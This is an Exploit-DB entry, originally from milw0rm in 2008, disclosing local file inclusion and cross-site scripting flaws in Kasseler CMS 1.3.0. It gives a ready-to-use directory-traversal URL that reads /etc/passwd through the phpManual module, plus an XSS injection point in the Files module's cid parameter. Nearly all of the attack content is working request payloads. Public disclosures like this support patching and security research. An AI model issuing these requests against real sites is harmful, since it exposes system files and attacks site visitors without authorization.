Kasseler CMS 1.3.0 - Local File Inclusion / Cross-Site Scripting

EDB-ID:

6007

CVE:

2008-3088 2008-3087

EDB Verified:

Author:

Cr@zy_King

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-07-05

Vulnerable App:

Cr@zy_King / sqL L0v3r'Z Crew Co. 2008 // From Turkey

http://biyosecurity.com / If there isn't the devotion Success there... : )

Greatz : aLL my Friend'z

Kasseler-Cms (LFI/XSS) Multiple Remote Vulnerabilities

Down : http://www.kasseler-cms.net

LFI : http://127.0.0.1/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd

Xss : http://127.0.0.1/http://www.kasseler-cms.net/index.php?module=Files&do=Category&cid=[XSS] 

# milw0rm.com [2008-07-05]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services